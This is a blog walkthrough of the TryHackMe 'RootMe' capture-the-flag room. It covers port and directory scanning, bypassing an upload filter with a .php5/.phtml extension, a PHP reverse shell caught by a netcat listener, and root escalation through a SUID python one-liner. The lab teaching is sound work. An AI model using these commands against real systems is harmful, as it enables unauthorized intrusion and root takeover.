Walk Through for the TryHackMe RootMe Room

The room is available at https://tryhackme.com/room/rrootme

Recon

sudo nmap -sS -p- -T4 x.x.x.x -vv 
  • -sS for Syn/Stealth Scan
  • -p- to scan all 65545 ports
  • -T4 for agressive/noisy scan
  • -vv for very verbose to monitor the progress of the scan

And we find the following ports open

PORT STATE SERVICE REASON

  • 22/tcp open ssh syn-ack ttl 63
  • 80/tcp open http syn-ack ttl 63

Now its time to find out what those ports are funning

sudo nmap -sS -sV -p22,80 -T4 10.10.129.163 -vv
  • -sS for Syn/Stealth scan

  • -sV for Version scan

  • -p22,80 -the two open ports we found previously

  • -T4 for agressive/noisy scan

  • -vv for very verbose to monitor the progress of the scan

  • PORT STATE SERVICE REASON VERSION

  • 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

  • 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))

  • Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 tells us their is a web server running, lets see what is says.

Not much to see, but lets see if there are any hidden directories

dirb http://x.x.x.x /usr/share/dirb/wordlists/common.txt 
  • http points it at the server
  • /usr/share/dirb/wordlists/common.txt is a list of common directories to try

And the results are

Visiting http://x.x.x.x/panel/ gives us

and visiting http://x.x.x.x/uploads/gives us

Exploitation

Now lets try a upload a reverse web shell/backdoor to the server and see what happens. A user friendly and popular webshell is available at http://pentestmonkey.net/tools/web-shells/php-reverse-shell – just remember to edit the configuration so it points to your kali machine/vpn machine IP address. And select a port, or you can just leave it at the default 12345.

Uploading the shell.php gives this error message, which means the server is doing some basic checks to try and stop malicious uploads.

But if we change the file extension to something like .php5 or .phtml, it goes through. Then run netcat or ncat in listener mode on your machine with the command

nc -nvlp 4444 or whatever the port you selected.

Then visit http://x.x.x.x/uploads/ and click on your uploaded file and your should then have a shell connected on your machine via netcat.

After that, lets do a quick search for the user.txt file,

find / -type f -name user.txt 2> /dev/null

Now, its time to elevate our permissions to root to get the final flag so lets do a search for files that have a SUID of root. (This means that the files run with the permissions of the file owner, not your login)

find / -user root -perm /4000

You will find multiple files with the correct permissions, but we need a shell. And python fits the bill nicely. So change to the directory where the python executable is located.

With a little google searching, you can find the GTFOBins page at https://gtfobins.github.io/ which curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems. A quick scroll down the page and you can find the page for GTFOBINS python at https://gtfobins.github.io/gtfobins/python/#suid.

After this, run the command listed on the page.

./python -c 'import os; os.setuid(0); os.system("/bin/sh")'

Then run the whoami command to confirm you are root, and then change to the /root/ directory to find the root.txt flag file

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s